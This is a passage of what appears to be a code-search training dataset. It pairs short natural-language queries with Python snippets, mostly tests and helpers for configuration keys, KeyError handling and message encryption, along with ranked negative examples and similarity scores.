core.Config()\n\n with pytest.raises(KeyError):\n c['doesNotExist']", "def test_invalid_key(self):\n with pytest.raises(yaenv.EnvError) as err:\n _ = yaenv.core.EnvVar('221b=\"starts with number\"')\n assert 'Invalid key' in str(err.value)\n with pytest.raises(yaenv.EnvError) as err:\n _ = yaenv.core.EnvVar('_=\"not assignable\"')\n assert 'Invalid key' in str(err.value)\n with pytest.raises(yaenv.EnvError) as err:\n _ = yaenv.core.EnvVar('o-o=\"invalid character\"')\n assert 'Invalid key' in str(err.value)", "def get_or_raise(self, key: str, error_message: str = None) -> str:\n v = self.get_or_default(key, None)\n if v is None:\n if error_message is None:\n print(\"Error, '\" + key + \"' is required.\")\n else:\n print(error_message)\n raise CLIMissingKeyError(error_message)\n\n else:\n return v", "def __missing__(self, key):\n return key", "def test_incorrect_prediction_key(self):\n self._config['Prediction key'] = 'wrong_key'\n with self.assertRaisesRegex(ValueError, 'Invalid prediction key'):\n self._gen.generate(\n example=self._example,\n model=self._model,\n dataset=self._dataset,\n config=self._config)", "def test_get_empty(empty_bucket): # pylint: disable=redefined-outer-name\n with pytest.raises(KeyError):\n empty_bucket.get(\"key 1\")", "def test_missingKey(self):\n self.assertIsNone(self.users.key(\"mystery domain\", \"mystery user\"))", "def test_get_invalid_key(self):\n pairs = {'library': '~/home/documents/dms',\n 'key': 'value',\n }\n exceptionKeys = ['Hello', 'spam']\n try:\n tempconfig = tempfile.NamedTemporaryFile(\n suffix=\".yaml\", delete=False)\n tempconfig.write('ham: eggs'.encode('UTF-8'))\n tempconfig.close()\n config = easydms.config.Config(tempconfig.name)\n\n for key, value in pairs.items():\n self.assertEqual(config.getKey(key, value), value)\n\n for key in exceptionKeys:\n with self.assertRaises(easydms.config.ErrorConfigKeyNotFound):\n config.getRequiredKey(key)\n finally:\n os.remove(tempconfig.name)", "def test_keys_failure(self):\n storage = Storage()\n storage._keys_dict = {'1': 'one',\n 'abc': '1'}\n self.assertRaises(StoragePatternError, storage.keys, 'ab[cd')", "def validate_key(key):\r\n try:\r\n secret.Secret(key)\r\n except secret.Secret.InvalidSecret as e:\r\n raise KeyIsInvalid(e.message)", "def avoid_keyerror(dictionary, key):\n\t\"*** YOUR CODE HERE ***\"\n\ttry:\n\t\tvalue = dictionary[key]\n\texcept KeyError:\n\t\tprint('Avoid Exception')\n\t\tdictionary[key] = value = 'no value'\n\tfinally:\n\t\treturn value", "def test_set_key_filename_missing(self):\n command_line = self._MENU + [self._KEYNAME, \"--keyfile-path\", \"/bogus\"]\n self.check_error(StratisCliKeyfileNotFoundError, command_line, _ERROR)", "def test_invalid_keys(self):\n\n\t\ttry:\n\t\t\tyield self.conn.set(\"this has spaces\", 1)\n\t\texcept ValueError:\n\t\t\tpass\n\t\telse:\n\t\t\tself.fail(\"key with spaces did not raise ValueError\")\n\n\t\ttry:\n\t\t\tyield self.conn.set(\"\\x10control\\x02characters\\x11\", 1)\n\t\texcept ValueError:\n\t\t\tpass\n\t\telse:\n\t\t\tself.fail(\"key with control characters did not raise ValueError\")\n\n\t\ttry:\n\t\t\tyield self.conn.set(\"a\" * (SERVER_MAX_KEY_LENGTH + 1), 1)\n\t\texcept ValueError:\n\t\t\tpass\n\t\telse:\n\t\t\tself.fail(\"long key did not raise ValueError\")\n\n\t\ttry:\n\t\t\tyield self.conn.set(u\"unicode\\u4f1a\", 1)\n\t\texcept TypeError:\n\t\t\tpass\n\t\telse:\n\t\t\tself.fail(\"unicode key did not raise ValueError\")", "def test_key_none(self):\n try:\n AlphaVantage()\n self.fail(msg='A None api key must raise an error')\n except ValueError:\n self.assertTrue(True)", "def test_key_none(self):\n try:\n AlphaVantage()\n self.fail(msg='A None api key must raise an error')\n except ValueError:\n self.assertTrue(True)", "def validate_key(self, key: keyType) -> bool:\n if isinstance(key, (dict,bool)):\n raise Exception\n if key is None:\n raise Exception\n # Numerical key object has no len(),\n # so explicitly specify which types are not allowed to use empty value as keys\n if isinstance(key, (str, tuple, set, list)) and (len(key) == 0):\n raise Exception\n return True", "def testBadKeyToToken(self):\n key = 5\n self.assertRaises(ValueError, dataToToken, key, data='hey')", "def __check_key_validity(self, key):\n if not isinstance(key, tuple):\n raise TypeError(\"key must be a tuple\")\n if len(key) != 2:\n raise ValueError(\"key must be of length two\")\n if not (isinstance(key[0], int) and isinstance(key[1], int)):\n raise TypeError(\"elements of key must be integers\")\n if not ((0 <= key[0] < self.m) and (0 <= key[1] < self.n)):\n raise exc.OutOfBoundsError(\"key is out of bounds\")", "def testKeyInfoTooLong(self):\n key = 5\n self.assertRaises(ValueError, dataToToken, key, data='hey',\n keyInfo='xxxxx')", "def isValidKey(key):\n return True", "def test_throws_base_price_missing_key(self):\n with pytest.raises(marshmallow.ValidationError):\n BasePrice.Schema().loads(json.dumps(base_price_missing_key))", "def test_getitem_error(self):\n with self.assertRaises(KeyError):\n self.tester['Not_a_Sample']", "def test_getitem_error(self):\n with self.assertRaises(KeyError):\n self.tester['Not_a_Sample']", "def provoke_and_handle_KeyError():\n test_dict = {}\n try:\n print(test_dict['to life'])\n except KeyError as ke:\n print(f\"Sorry! The key '{ke}' does not exist in test_dict!\")", "def test_empty_key_raises_error(empty_viewset):\n viewset = empty_viewset\n system1 = viewset.model.add_software_system(name=\"sys1\")\n\n with pytest.raises(ValueError, match=\"A key must be specified\"):\n viewset.create_container_view(\n key=\"\", description=\"container\", software_system=system1\n )", "def validate_instruction_keys(instruction: TransactionInstruction, expected: int) -> None:\n if len(instruction.keys) < expected:\n raise ValueError(f\"invalid instruction: found {len(instruction.keys)} keys, expected at least {expected}\")", "def test_toomanykeys(self):\n self.assertRaises(recordparser.KeyListMismatchError,\n recordparser.getfields, \"1234567890\", \"10s\", (\"key1\", \"key2\"))", "def handle_key(self, key):\n pass", "def testBadKeys(self):\n # Ignore access to protected members\n # pylint: disable=W0212\n self.assertRaises(DOLAPI._DOLAPIError,\n self.badauth.table,\n self.dataset,\n self.table)", "def test_no_key_raises_error(empty_viewset):\n viewset = empty_viewset\n system1 = viewset.model.add_software_system(name=\"sys1\")\n\n with pytest.raises(ValueError, match=\"A key must be specified\"):\n viewset.create_container_view(description=\"container\", software_system=system1)", "def _invalid_transport_key_id():\n pecan.abort(404, u._('Not Found. Provided transport key id is invalid.'))", "def assert_key_exists(self, key, caller):\n assert key, (\"key parameter must be specified.\")\n if key not in self:\n raise KeyNotInContextError(\n f\"context['{key}'] doesn't exist. It must exist for {caller}.\")", "def keyIsValid(key):\n\n isValid = 1\n \n try:\n temp = getParam(key)\n\n except ValueError:\n isValid = 0\n warning(\" WARNING: %s not set\" % (key))\n\n return isValid", "def mock_from_string(*args, **kwargs):\n raise InvalidKeyError('foo', 'bar')", "def test_PerfectModel_verify_metric_keyerrors(\n perfectModelEnsemble_initialized_control, metric\n):\n with pytest.raises(KeyError) as excinfo:\n perfectModelEnsemble_initialized_control.verify(\n comparison=\"e2c\",\n metric=metric,\n dim=[],\n )\n assert \"Specify metric from\" in str(excinfo.value)", "def testMissingKeys(self):\n self.assertRaises(ValueError,\n self.unauth.table,\n self.dataset,\n self.table)", "def test_nokey(testchannel, methodname):\n key = 42\n\n with pytest.raises(KeyError) as err:\n getattr(testchannel, methodname)(key)\n\n assert err.value.args == (key, )", "def test_get_key_digest_with_no_parameter(self):\n with pytest.raises(TypeError) as typeError:\n self.as_connection.get_key_digest()\n\n assert \"argument 'ns' (pos 1)\" in str(\n typeError.value)", "def _GetCompleteKeyOrError(arg):\n if isinstance(arg, Key):\n key = arg\n elif isinstance(arg, basestring):\n key = Key(arg)\n elif isinstance(arg, Entity):\n key = arg.key()\n elif not isinstance(arg, Key):\n raise datastore_errors.BadArgumentError(\n 'Expects argument to be an Entity or Key; received %s (a %s).' %\n (arg, typename(arg)))\n assert isinstance(key, Key)\n\n if not key.has_id_or_name():\n raise datastore_errors.BadKeyError('Key %r is not complete.' % key)\n\n return key", "def fail(self, key, **kwargs):\n return fail(self, key, **kwargs)", "def error(self, key, **kwargs):\n try:\n msg = self.error_messages[key]\n except KeyError:\n class_name = self.__class__.__name__\n raise AssertionError('Error with key={} is not found for class={}'.format(key, class_name))\n message_string = msg.format(**kwargs)\n raise ValidationError(message_string, code=key)", "def test_getKey_nokey(self):\n filename = os.path.join(os.getcwd(), 'sekrit')\n key = crypto.getKey(filename)\n self.failUnlessIsInstance(key, basestring,\n \"key isn't a string! type=%r\" % type(key))", "def test_encrypt_key_invalid(self):\n with pytest.raises(EncryptionError):\n encrypt('message', key=b'0' * 31)", "def _transport_key_not_found():\n pecan.abort(404, u._('Not Found. Transport Key not found.'))", "def test_api_key_error(api):\n\twith pytest.raises(top_stories.APIKeyError):\n\t\tmissingAPI = top_stories.TopStoriesAPI()", "def test_PerfectModel_verify_comparison_keyerrors(\n perfectModelEnsemble_initialized_control, comparison\n):\n with pytest.raises(KeyError) as excinfo:\n perfectModelEnsemble_initialized_control.verify(\n comparison=comparison,\n metric=\"mse\",\n dim=[],\n )\n assert \"Specify comparison from\" in str(excinfo.value)", "def test_prediction_key_required(self):\n self._config['Prediction key'] = ''\n with self.assertRaisesRegex(ValueError,\n 'Please provide the prediction key'):\n self._gen.generate(\n example=self._example,\n model=self._model,\n dataset=self._dataset,\n config=self._config)", "def error(self, key, value, context, errorclass=InvalidDataError, **values):\n msg_template = self.message_for_key(key, context)\n raise errorclass(msg_template % values, value, key=key, context=context)", "def checkIndex(key):\n if not isinstance(key, (int, float)): raise TypeError\n if key<0: raise IndexError", "def test_unknown_api_key(self, app, data_queues, redis, metricsmock, logs):\n res = self._call(app, api_key=\"abcdefg\", ip=self.test_ip, status=400)\n self.check_response(data_queues, res, \"invalid_key\")\n metricsmock.assert_incr_once(\n self.metric_type + \".request\", tags=[self.metric_path, \"key:invalid\"]\n )\n assert redis.keys(\"apiuser:*\") == []\n assert logs.only_entry[\"api_key\"] == \"invalid\"\n assert logs.only_entry[\"invalid_api_key\"] == \"abcdefg\"", "def handle_key(self, k):\n\t\treturn False", "def test_is_valid_label_key_invalid_input():\n # test length violations\n assert not is_valid_label_key(key=None) # Too short\n assert not is_valid_label_key(key=\"\") # Too short\n assert not is_valid_label_key(key=f\"{'p' * 254}/n\") # prefix too long\n assert not is_valid_label_key(key=\"/n\") # prefix too short\n assert not is_valid_label_key(key=\"p/\") # name too short\n assert not is_valid_label_key(key=\"a\" * 254) # name too long\n assert not is_valid_label_key(key=f\"d/{'b'*64}\") # name too long\n # test first character violations (not alphanum)\n assert not is_valid_label_key(key=\"-a\")\n assert not is_valid_label_key(key=\".b\")\n assert not is_valid_label_key(key=\" c\")\n # test last character violations (not alphanum)\n assert not is_valid_label_key(key=\"a-\")\n assert not is_valid_label_key(key=\"b.\")\n assert not is_valid_label_key(key=\"c \")\n assert not is_valid_label_key(key=\"sw33T#\")\n # test middle characters violations\n assert not is_valid_label_key(key=\"a$$a\")\n assert not is_valid_label_key(key=\"b b\")", "def key_error_message(self,key):\n if not key:\n return 'key is blank.'\n elif any(map(lambda s: s in key,space_chars)):\n return '\"{}\" contains whitespace.'.format(key)\n elif any(map(lambda s: s in key,bad_chars)):\n return '\"{}\" contains special characters.'.format(key)", "def test_invalid_parameters(key, val):\n with pytest.raises(ParameterError):\n FastBasic(**{key: val}).read(\"1 2 3\\n4 5 6\")\n with pytest.raises(ParameterError):\n ascii.read(\"1 2 3\\n4 5 6\", format=\"fast_basic\", guess=False, **{key: val})", "def test_no_such_key():\n test = [{'key': 'val1'}, ['missing']]\n t_result = fetch_data_by_keys(*test)\n assert not is_successful(t_result)\n assert 'missing' in str(t_result.failure())", "def default(self, key):\n raise KeyError(repr(key))", "def test_failure_with_invalid_api_key(self):\n self.geocoder = Yandex(\n api_key='bad key'\n )\n with self.assertRaises(GeocoderInsufficientPrivileges):\n self.geocode_run(\n {\"query\": \"площадь Ленина Донецк\"},\n {}\n )", "def test_missing_mandatory(self):\n try:\n CollectorUpdate()\n self.assertFalse(\"RuntimeError expected\")\n except RuntimeError as exception:\n assert_that(str(exception), equal_to(\"Missing keys: 'stage', 'status', 'timestamp'\"))", "def test_no_key(self):\n with self.assertRaises(ConfigError) as cm:\n imageroller.main.read_authconfig(\n imageroller.test.get_config_parser(self._no_key))\n self.assertEqual(str(cm.exception), \"AuthConfig must contain ApiKey\")", "def test_other_user_kvs_get_failure(self):\r\n with self.assertRaises(AssertionError):\r\n self.kvs.get(self.other_key_factory(self.existing_field_name))", "def _validate_key(self, key):\n if isinstance(key, str):\n key = unicode(key, 'utf-8')\n elif not isinstance(key, unicode):\n raise TypeError(\n \"`key` must be `str` or `unicode`, not `{}`\".format(\n key.__class__.__name__)\n )\n return key", "def test__getitem__(self, in_, key, out_):\n if isinstance(out_, Exception):\n with pytest.raises(type(out_)) as excinfo:\n in_[key] # pylint: disable=W0104, pointless-statement\n assert excinfo.value.args[0] == out_.args[0]\n return\n assert in_[key] == out_", "def test_neg_exists_with_invalid_meta(self, key, record, policy, ex_code, ex_msg, put_data):\n put_data(self.as_connection, key, record)\n\n with pytest.raises(e.ParamError):\n key, _ = self.as_connection.exists(key, policy)\n\n # except e.ParamError as exception:\n # assert exception.code == ex_code\n # assert exception.msg == ex_msg", "def test_getitem_error(self):\n with self.assertRaises(KeyError):\n self.tester['Not_a_Category']", "def test_getitem_error(self):\n with self.assertRaises(KeyError):\n self.tester['Not_a_Category']", "def test_blank_key(self):\n with self.assertRaises(ConfigError) as cm:\n imageroller.main.read_authconfig(\n imageroller.test.get_config_parser(self._blank_key))\n self.assertEqual(str(cm.exception), \"AuthConfig must contain ApiKey\")", "def test_invalid_distribution_info_keys(self):\n\n invalid_distrib_info_keys = {\"bad_key\": \"\", \"badder_key\": True, \"worker_cost\": False}\n self.ocp_data[\"distribution_info\"] = invalid_distrib_info_keys\n self.assertEqual(self.ocp_data[\"distribution_info\"], invalid_distrib_info_keys)\n with tenant_context(self.tenant):\n serializer = CostModelSerializer(data=self.ocp_data, context=self.request_context)\n with self.assertRaises(serializers.ValidationError):\n serializer.is_valid(raise_exception=True)", "def test_setter_invalid_key(self):\n root = netapp_api.NaElement('root')\n try:\n root[None] = 'value'\n except Exception as e:\n if not isinstance(e, KeyError):\n self.fail(_('Error not a KeyError.'))", "def test_setter_invalid_key(self):\n root = netapp_api.NaElement('root')\n try:\n root[None] = 'value'\n except Exception as e:\n if not isinstance(e, KeyError):\n self.fail(_('Error not a KeyError.'))", "def test_getitem_nokey(testchannel):\n key = testchannel.add(list)\n for i in range(5):\n testchannel.add(list)\n testchannel.remove(key)\n\n with pytest.raises(KeyError) as err:\n testchannel.__getitem__(key)\n\n assert err.value.args == (key, )", "def add_existing_key_fail(self, data):\n message = 'exists'\n rv = self.add_success(data)\n assert not in_response(rv, message)\n return self.add_fail(data, message)", "def test_adding_config_keys():\n\n with pytest.raises(ValueError) as error:\n Config.config()[\"something_fake\"] = True\n\n assert \"something_fake is not a valid config key.\" in error.value.args", "def _check_transform_key(key: Hashable) -> None:\n _test_hashable = hash(key) # The only 'real' way to make sure is hashable\n # if not isinstance(key, Hashable):\n # raise TypeError((type(key), \"transformation lookup key is not hashable\"))", "def _check(self, key):\n if not self.contains(key):\n raise KeyError(\"ConfigManager does not contain key '%s'\" % key)", "def existing_key_fail(self, data, new_data):\n message = 'exists'\n rv = self.add_success(data)\n assert not in_response(rv, message)\n self.add_fail(data, message)\n rv = self.add_success(new_data)\n assert not in_response(rv, message)\n self.update_fail(data, message)\n assert self.verify_object(new_data)", "def _get(self, key: str):\n pass", "def _raiseIfWebsafeKeyNotValid(websafeKey, kind):\n # Check that websafeKey is not None\n if not websafeKey:\n raise endpoints.BadRequestException(\n \"Websafe key not provided for '%s'\" % kind)\n # Try to decode the websafe key into a real key\n try:\n key = ndb.Key(urlsafe=websafeKey)\n except:\n raise endpoints.BadRequestException(\n \"Websafe key provided for '%s' could not be decoded: %s\" %\n (kind, websafeKey))\n # Ensure that the key is of the desired kind\n if key.kind() != kind:\n raise endpoints.BadRequestException(\n \"Websafe key is not of the '%s' kind: %s\" % (kind, websafeKey))\n # If all is well, return the key\n return key", "def test_unset_key(self):\n context = {'help_key': 'unused-key'}\n self.assertRaises(\n ImproperlyConfigured,\n tags.madcap_flare_help,\n context)" ]
[ "0.7584052", "0.74336976", "0.7209498", "0.7197816", "0.71823823", "0.71537316", "0.70963115", "0.70610356", "0.7014894", "0.6917326", "0.6872797", "0.68682355", "0.6839676", "0.6820613", "0.6819844", "0.68171906", "0.68070513", "0.67946887", "0.67675406", "0.6766828", "0.6689345", "0.6685377", "0.6685339", "0.66765165", "0.66706324", "0.6660688", "0.66537595", "0.660068", "0.6589604", "0.65894747", "0.65646064", "0.6555247", "0.6545968", "0.65304375", "0.6527731", "0.65242934", "0.65242934", "0.6523482", "0.65109956", "0.64860195", "0.6484437", "0.64771384", "0.64715946", "0.6471414", "0.6471414", "0.64481884", "0.6446104", "0.64025974", "0.63836926", "0.63737154", "0.63675773", "0.6364753", "0.6363654", "0.6352129", "0.63467234", "0.6339463", "0.6337334", "0.63249034", "0.6309142", "0.6308538", "0.6302702", "0.6297178", "0.6294687", "0.62800276", "0.62693936", "0.62456393", "0.6241466", "0.6240813", "0.6235896", "0.6201875", "0.6197422", "0.61898214", "0.61795086", "0.6176109", "0.61718404", "0.6169958", "0.61650836", "0.61647063", "0.61641055", "0.6159244", "0.6149768", "0.61244255", "0.611399", "0.6112647", "0.61070794", "0.61043185", "0.61043185", "0.61023074", "0.609772", "0.6093386", "0.6093386", "0.60834545", "0.6074696", "0.6072588", "0.6072328", "0.6071305", "0.6064107", "0.60601485", "0.6050981", "0.60496646" ]
0.6123274
82
It gets its default key from settings.
def test_decrypt_key_default(self, settings): settings.CHITON_ENCRYPTION_KEY = b'0' * 32 encrypted = encrypt('message') assert decrypt(encrypted) == 'message' settings.CHITON_ENCRYPTION_KEY = b'1' * 32 with pytest.raises(EncryptionError): decrypt(encrypted)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def default(self, key):\r\n return self.inherited_settings[key.field_name]", "def get(self, key, default=None):\n return self.settings.get(key, default)", "def initial(self):\n from setman import settings\n return getattr(settings, self.name, self.default)", "def get_setting_default(cls, key, **kwargs):\n setting = cls.get_setting_definition(key, **kwargs)\n\n return setting.get('default', '')", "def get_setting(self, key, default=NOT_SET):\n if key in self.settings:\n return self.settings[key]\n app_key = 'tangled.app.' + key\n if app_key in self.settings:\n return self.settings[app_key]\n if default is NOT_SET:\n raise KeyError(\"'{}' not present in settings\".format(key))\n return default", "def get_setting_value(self, key, default = None):\n \n if not \"settings\" in self.configuration or not key in self.configuration['settings']:\n return default\n \n return self.configuration['settings'][key]", "def get(self, key: str, default: Optional[str] = None) -> Optional[str]:\n if key == \"stitch\":\n return \"NewStitch\"\n return key", "def get(self, key, default=None):", "def get(self, key, default=None):\n pass", "def get(self, key: str, default: Optional[str] = None) -> Optional[str]:\n if key == \"Dinosaur\":\n return \"NewDinosaur\"\n return key", "def get(self, id, key, default=None):\n try:\n id_settings = self.id_dict[id]\n val = id_settings[key]\n except KeyError:\n try:\n val = self.default_settings[key]\n except KeyError:\n val = default\n return val", "def get(self, key, default):\n return self.plugin.get(key, default)", "def get(self, key, default=None):\n try:\n val = self._store.get(key)\n except KeyError:\n val = default\n if val is None and not default:\n return self._auto_prompt(key)\n return val", "def get(self, key: str, default: Optional[str] = None) -> Optional[str]:\n if key == \"Dinosaur\":\n return None\n return key", "def get(self, name, default=''):\n return getattr(settings, name, DEFAULT_SETTINGS.get(name, default))", "def getKey( self, key ):\n if key in self.conf:\n return self.conf[key]\n else:\n return None", "def get(self, key, default=None):\n if key in self:\n return self[key]\n return default", "def get(self, key, default=None):\n return self[key] if key in self else default", "def get(self, key, default=None):\n try:\n return self[key]\n except KeyError:\n return default", "def get(self, key: str, default: Optional[str] = None) -> Optional[str]:\n if key == \"id\":\n return \"Id\"\n return key", "def get(self, key, default=None):\r\n try:\r\n return self[key]\r\n except KeyError:\r\n return default", "def get(self, key, default=None):\n raise NotImplementedError()", "def get(cls, key: EnumKeyType, default: EnumKeyType = None) -> str:\n try:\n return cls[key]\n except KeyError:\n return default", "def get_sublime(self, key, default=None):\n return self.sublime_settings.get(key, default)", "def get(key, default=None):\n config = _get_config_dict()\n return config.get(key, default)", "def get(self, key, default=None):\n try:\n return self.context.get(self.prefix+'.'+key, default)\n except AttributeError:\n return default", "def get_setting(setting_name, default=None):\n settings_dict = getattr(settings, 'SIMPLE_FORUMS', None)\n\n if settings_dict:\n return settings_dict.get(setting_name, default)\n\n return default", "def get(self, key, default=None):\n return self.get_models().get(str(key), default)", "def default_value(self):\n return self.__class__.get_setting_default(self.key, **self.get_kwargs())", "def get(self, key, default=None):\n try:\n return self._get(key)\n except Exception:\n return default", "def get(self, key: str, default=None) -> Any:\n try:\n return self[key][0]\n except KeyError:\n return default", "def get_default(self):\n\n\t\treturn self.__default", "def get_option(self, key, default=None):\n current_profile = \"profiles.{}.{}\".format(self.get_profile(), key)\n global_profile = \"profiles.global.{}\".format(key)\n return self.__get_option__(current_profile, self.__get_option__(global_profile, default))", "def getDefault():", "def get_dictionary_default(path):\n if path in defaults_dict.keys():\n return defaults_dict[path]\n else:\n return ''", "def Default():\n return _DEFAULT", "def get(self, key, default=0):\n try:\n return self[key]\n except KeyError:\n return default", "def get(self, key, default=''):\n key = self.optionxform(key)\n cached = self._cache.get(key, _use_default)\n if cached is not _use_default:\n return cached\n name_str = self.name\n key_str = to_unicode(key)\n settings = ProductSetting.select(self.env,\n where={'product': self.product,\n 'section': name_str,\n 'option': key_str})\n if len(settings) > 0:\n value = settings[0].value\n else:\n for parent in self.config.parents:\n value = parent[self.name].get(key, _use_default)\n if value is not _use_default:\n break\n else:\n if default is not _use_default:\n option = Option.registry.get((self.name, key))\n value = option.default if option else _use_default\n else:\n value = _use_default\n if value is _use_default:\n return default\n if not value:\n value = u''\n elif isinstance(value, basestring):\n value = to_unicode(value)\n self._cache[key] = value\n return value", "def get(self, keyname: str, default: Optional[Any] = None) -> Any:\n try:\n return self[keyname]\n except KeyError:\n return default", "def default(self, key):\n raise KeyError(repr(key))", "def getSetting(self,section,key,default=None):\n section,key = map(bolt.LString,(section,key))\n settings = self.getSettings()\n if section in settings:\n return settings[section].get(key,default)\n else:\n return default", "def setting(name, default=None):\n return getattr(settings, name, default)", "def _get_simple_default_value(simple):\n return _SIMPLE_DEFAULT_VALUES[simple]", "def get(self, key):\n try:\n if key == key.upper():\n return self.config[key]\n return self.options[key]\n except KeyError:\n return None", "def default_value(self, key: str) -> Any:\n return _ba.get_appconfig_default_value(key)", "def get(self, key, default=None):\n return self._d.get(key, default)", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def getKey(kwargs,key,default=None):\n value = kwarg.get(key,default)\n if value==None:\n return default\n return value", "def setdefault(self, key):\n pass", "def get_default(name, value):\n return os.environ.get('EXAMPLE_{}'.format(name.upper()), value)", "def default(self):\n return self.get(name='Unknown')", "def default():\n return DefaultSwh.default()", "def get(self, key, default_val=None):\n if key not in self._config.keys(): # we don't want KeyError\n return default_val # just return None if not found\n return self._config[key]", "def get_setting_definition(cls, key, **kwargs):\n settings = kwargs.get('settings', cls.SETTINGS)\n\n key = str(key).strip().upper()\n\n if settings is not None and key in settings:\n return settings[key]\n else:\n return {}", "def get(self, key: str, default: Any = None) -> Any:\n try:\n return getattr(self, key)\n except AttributeError:\n return default", "def get(self, key: str, default: Optional[Any] = None) -> Any:\n raise NotImplementedError", "def get(self, key: str, default: Union[str, T] = '') -> Union[str, T]:\n key = key.casefold()\n for k in self._keys:\n if k.casefold() == key:\n return self._keys[k]\n else:\n return default", "def opt(self, key, default=False):\n if key not in self.options:\n return default\n return self.options.get(key)", "def get(self, name):\n try:\n return self._defaults[name]\n except KeyError:\n raise UndefinedDefault(\"default %s is undefined\" % name)", "def setdefault_key_value(self):\n raise NotImplementedError", "def get_global(self, key, default=None, as_tuple=False):\n if as_tuple:\n return (self.get_global(key, default, as_tuple=False), True)\n else:\n return self.settings.get(key, default)", "def get(self, key, default=None):\n result = self._get_raw_input().get(key, default)\n return result[0] if isinstance(result, list) else result", "def GetSetting(appname, section, key, default=None):\n settings = _OptionsDB(appname)\n try:\n return settings[section, key]\n except config.configparser.Error:\n if default is not None:\n return default\n raise", "def TeXKey(self, default=None):\n return self.data.get('texkey', default)", "def load_key():", "def setdefault(self, key: str, default: Any = None) -> Any:\n try:\n return self[key]\n except KeyError:\n self[key] = default\n return self[key]", "def get(self, metakey, default=None):\n if metakey in self:\n return self[metakey]\n return default", "def get_default_access_key_id():\n access_key_id_script = AWS_ACCOUNTS['default'].ACCESS_KEY_ID_SCRIPT.get()\n return access_key_id_script or get_s3a_access_key()", "def getcfg(self, key, default=None):\n return self._config.get(key, default)", "def get(self, key, default=None):\n try:\n return self.__getitem__(key)\n except ValueError:\n if default is not None:\n return default\n else:\n raise", "def get(self, key, default=None):\n return self.metadata_dict.get(key, default)", "def get(self, key, default=None):\n return self.data.get(key, default)", "def get(self, key, default=None):\n return self.data.get(key, default)", "def get_from_environ(key: str, default: Any = None) -> str:\n return os.environ.get(key, default)" ]
[ "0.7820905", "0.76434904", "0.7315344", "0.7273974", "0.7266542", "0.7164663", "0.708993", "0.7069916", "0.7067126", "0.70258087", "0.70121825", "0.69252306", "0.686531", "0.6851818", "0.6849022", "0.6843253", "0.678574", "0.6693812", "0.66881984", "0.664332", "0.6612321", "0.6610823", "0.6604265", "0.65919226", "0.65308213", "0.6520606", "0.65183884", "0.65071595", "0.6506874", "0.6498181", "0.6491904", "0.6483908", "0.64564943", "0.6451418", "0.6442761", "0.64354736", "0.64316875", "0.6429961", "0.64269054", "0.6421008", "0.6418649", "0.64052576", "0.64047796", "0.639343", "0.63873017", "0.63833815", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.6350485", "0.63468194", "0.63334274", "0.63232225", "0.63205796", "0.63046205", "0.6303444", "0.6299824", "0.6281038", "0.6248287", "0.6246647", "0.6237095", "0.62338537", "0.6232617", "0.619575", "0.61891294", "0.6182222", "0.61795634", "0.6178773", "0.61645335", "0.6162935", "0.61598754", "0.61508507", "0.6146326", "0.61368436", "0.61368436", "0.6136821" ]
0.0
-1
It encrypts messages as base64encoded strings.
def test_encrypt_encoding(self): encrypted = encrypt('message') assert encrypted assert encrypted != 'message' assert type(encrypted) == str
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def encrypted(data: str) -> str:\n return b64encode(data.encode('ascii')).decode('ascii')", "def encrypt(strings):\r\n rd = ''.join(random.sample(upperchr+lowcarsechr+otherchr+numchr,10))\r\n output = base64.encodestring(strings+mselment+rd)\r\n print output", "def test_encryption_of_string(cipher):\n iv = Random.new().read(AES.block_size)\n encrypted = cipher.encrypt(message)\n assert base64.b64encode(base64.b64decode(encrypted)) == encrypted", "def encrypt_message(self, message: dict) -> None:\n secure_message = {'type': 'SECURE_MESSAGE', 'content': None}\n content = json.dumps(message).encode()\n \n ct = self.crypto.encrypt(content)\n secure_message['content'] = base64.b64encode(ct).decode()\n self.encrypted_data += secure_message['content']\n\n return secure_message", "def encode(msg: str) -> str:\n\n msg_bytes = msg.encode(\"ascii\")\n b64_bytes = base64.b64encode(msg_bytes)\n return b64_bytes.decode(\"ascii\")", "def base64_encode(data):\n return base64.encodestring(data);", "def encrypt_and_encode(data, key):\r\n return base64.urlsafe_b64encode(aes_encrypt(data, key))", "def encryption(msg):\n \n start_key = 123\n key_increment = 4\n string = []\n encoded = []\n key = start_key\n message = msg\n for c in range(0, len(message)):\n code 